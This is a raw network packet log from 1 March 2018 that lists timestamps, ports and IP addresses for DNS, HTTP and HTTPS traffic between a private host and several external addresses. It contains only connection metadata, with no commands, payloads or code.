Mar 1, 2018 09:57:13.158276081 CET	63053	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:13.158828020 CET	53	63053	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:13.158937931 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:13.158952951 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:13.158961058 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:13.159327030 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:13.161866903 CET	49169	80	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:13.161905050 CET	80	49169	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:13.162595034 CET	49169	80	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:13.163481951 CET	49169	80	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:13.163507938 CET	80	49169	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:13.531763077 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:13.531783104 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:13.531790018 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:13.531954050 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:13.866169930 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:13.866286039 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:14.191948891 CET	60812	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:14.301306009 CET	53	63053	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:15.209913969 CET	60812	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:15.524403095 CET	53	63053	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:15.524461985 CET	80	49169	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:15.524699926 CET	49169	80	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:15.609568119 CET	49170	443	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:15.609606981 CET	443	49170	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:15.610387087 CET	49170	443	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:15.686712980 CET	49170	443	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:15.686738968 CET	443	49170	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:16.211612940 CET	60812	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:16.825757027 CET	53	60812	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:17.722167015 CET	443	49170	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:17.722187042 CET	443	49170	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:17.722193956 CET	443	49170	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:17.724554062 CET	49170	443	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:18.208877087 CET	53	60812	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:18.208971024 CET	443	49170	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:18.208985090 CET	443	49170	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:18.209162951 CET	49170	443	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:18.336190939 CET	49170	443	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:18.336210966 CET	443	49170	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:19.085834026 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:19.085880041 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:19.086431980 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:19.088671923 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:19.088706017 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:19.339163065 CET	53	60812	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:19.706326008 CET	80	49169	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:19.706356049 CET	443	49170	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:19.706538916 CET	49169	80	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:19.706593037 CET	49170	443	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:20.221069098 CET	58523	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:20.428879976 CET	65490	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:20.531554937 CET	60652	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:20.817533016 CET	80	49168	67.199.248.11	192.168.2.2
Mar 1, 2018 09:57:20.817749023 CET	49168	80	192.168.2.2	67.199.248.11
Mar 1, 2018 09:57:21.002276897 CET	57729	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:21.229552031 CET	58523	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:21.429204941 CET	65490	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:21.529062033 CET	60652	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:21.603058100 CET	53	58523	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:21.603112936 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:21.603535891 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:21.610891104 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:21.610903978 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:21.615844965 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:21.615856886 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:21.676773071 CET	65311	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:21.911025047 CET	53	65490	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:21.977274895 CET	50323	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:21.999732971 CET	57729	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:22.093091965 CET	49170	443	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:22.093213081 CET	443	49170	45.33.77.71	192.168.2.2
Mar 1, 2018 09:57:22.093308926 CET	49170	443	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:22.530736923 CET	60652	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:22.670649052 CET	65311	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:22.956949949 CET	53	60652	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:22.975256920 CET	50323	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:22.980951071 CET	64115	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:23.004892111 CET	57729	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:23.332871914 CET	53	57729	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:23.359987020 CET	59195	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:23.655411959 CET	53	58523	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:23.672350883 CET	65311	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:23.941188097 CET	53	65490	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:24.012903929 CET	64115	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:24.014298916 CET	50323	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:24.319217920 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:24.319236994 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:24.319243908 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:24.319375038 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:24.353622913 CET	59195	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:24.604068995 CET	53	60652	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:24.604192972 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:24.604207993 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:24.604216099 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:24.604353905 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:24.655747890 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:24.655956984 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:24.884758949 CET	53	65311	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:24.884852886 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:24.884865999 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:24.884874105 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:24.885047913 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:24.898773909 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:24.898966074 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:25.014039040 CET	64115	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:25.262485027 CET	53	50323	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:25.262598991 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:25.262612104 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:25.262619019 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:25.262769938 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:25.355865002 CET	59195	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:25.564321041 CET	53	57729	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:25.564393044 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:25.564611912 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:25.863488913 CET	53	60652	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:25.863611937 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:25.863626957 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:25.863635063 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:25.863990068 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:26.207884073 CET	53	65311	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:26.207962036 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:26.208045006 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:26.493432045 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:26.493448973 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:26.493455887 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:26.493576050 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:26.739892960 CET	53	50323	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:26.740046978 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:26.740612984 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:27.017045021 CET	64115	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:27.058597088 CET	53	64115	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:27.058691025 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:27.058705091 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:27.058893919 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:27.317419052 CET	53	57729	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:27.317547083 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:27.317560911 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:27.317569017 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:27.317971945 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:27.358584881 CET	59195	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:27.540205956 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:27.540225983 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:27.540441990 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:27.779385090 CET	53	59195	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:27.779489994 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:27.779504061 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:27.779689074 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:28.063702106 CET	53	65311	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:28.063793898 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:28.063807011 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:28.064328909 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:28.311620951 CET	53	64115	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:28.311749935 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:28.311765909 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:28.311774015 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:28.312200069 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:28.515000105 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:28.515187025 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:28.721529961 CET	53	50323	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:28.721649885 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:28.721662998 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:28.721671104 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:28.722008944 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:28.913222075 CET	53	59195	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:28.913301945 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:28.913665056 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:29.184597015 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:29.184856892 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:29.412544012 CET	53	64115	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:29.412739038 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:29.412753105 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:29.412760973 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:29.412866116 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:29.610423088 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:29.610441923 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:29.610450983 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:29.610568047 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:29.799603939 CET	53	59195	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:29.799721956 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:29.799736977 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:29.799745083 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:29.799910069 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:30.052643061 CET	53	64115	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:30.052722931 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:30.052736998 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:30.052925110 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:30.275892019 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:30.276098967 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:30.482549906 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:30.482569933 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:30.482578039 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:30.482883930 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:30.674688101 CET	53	59195	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:30.674808979 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:30.674824953 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:30.674834967 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:30.674925089 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:30.864480019 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:30.864506006 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:30.864515066 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:30.864792109 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:31.130868912 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:31.130886078 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:31.130892038 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:31.131078005 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:31.339698076 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:31.339715958 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:31.339721918 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:31.339948893 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:31.535892963 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:31.535912037 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:31.536170006 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:31.706270933 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:31.706290960 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:31.706552982 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:31.874363899 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:31.874383926 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:31.874392033 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:31.874547958 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:32.122947931 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:32.122967005 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:32.123182058 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:32.330735922 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:32.330755949 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:32.331021070 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:32.520159006 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:32.520179033 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:32.520186901 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:32.520363092 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:32.687411070 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:32.687570095 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:32.853955030 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:32.853980064 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:32.853987932 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:32.856470108 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:33.091165066 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:33.091183901 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:33.091191053 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:33.091453075 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:33.306786060 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:33.306812048 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:33.306819916 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:33.307070971 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:33.486161947 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:33.486182928 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:33.486404896 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:33.659622908 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:33.659642935 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:33.660278082 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:33.839407921 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:33.839426994 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:33.839433908 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:33.839698076 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:34.093475103 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:34.093492031 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:34.093498945 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:34.093748093 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:34.300476074 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:34.300709963 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:34.484466076 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:34.484488010 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:34.484496117 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:34.484569073 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:34.485068083 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:34.659451008 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:34.659652948 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:34.827694893 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:34.827714920 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:34.827722073 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:34.827919006 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:35.106276035 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:35.106296062 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:35.106303930 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:35.106477022 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:35.376884937 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:35.376904964 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:35.376913071 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:35.377132893 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:35.635098934 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:35.635118008 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:35.635126114 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:35.635462999 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:35.648030043 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:35.648222923 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:35.883204937 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:35.883512020 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:36.222978115 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:36.222985983 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:36.223241091 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:36.518412113 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:36.518603086 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:36.796570063 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:36.796590090 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:36.796602011 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:36.796921968 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:37.118719101 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:37.118738890 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:37.118746042 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:37.118962049 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:37.489447117 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:37.489722967 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:37.778156996 CET	58138	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:38.773844004 CET	58138	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:38.779525042 CET	53	58138	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:39.632617950 CET	53	58138	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:41.029369116 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:41.029511929 CET	443	49165	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:41.029870987 CET	49165	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:41.112113953 CET	49176	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:41.112160921 CET	443	49176	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:41.112461090 CET	49176	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:41.114478111 CET	49176	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:41.114509106 CET	443	49176	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:43.088717937 CET	443	49176	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:43.088999987 CET	49176	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:43.111824036 CET	49176	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:43.111852884 CET	443	49176	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:43.123663902 CET	49176	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:43.123689890 CET	443	49176	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:44.509574890 CET	443	49176	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:44.509816885 CET	49176	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:44.536007881 CET	60708	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:45.436494112 CET	53	60708	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:45.438513994 CET	49177	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:45.438545942 CET	443	49177	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:45.438972950 CET	49177	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:45.440423012 CET	49177	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:45.440445900 CET	443	49177	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:46.512511015 CET	443	49177	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:46.512528896 CET	443	49177	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:46.512536049 CET	443	49177	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:46.512834072 CET	49177	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:46.660196066 CET	443	49177	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:46.660384893 CET	49177	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:46.709953070 CET	49177	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:46.709976912 CET	443	49177	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:47.427511930 CET	443	49177	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:47.427762032 CET	49177	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:47.946141958 CET	65034	53	192.168.2.2	8.8.8.8
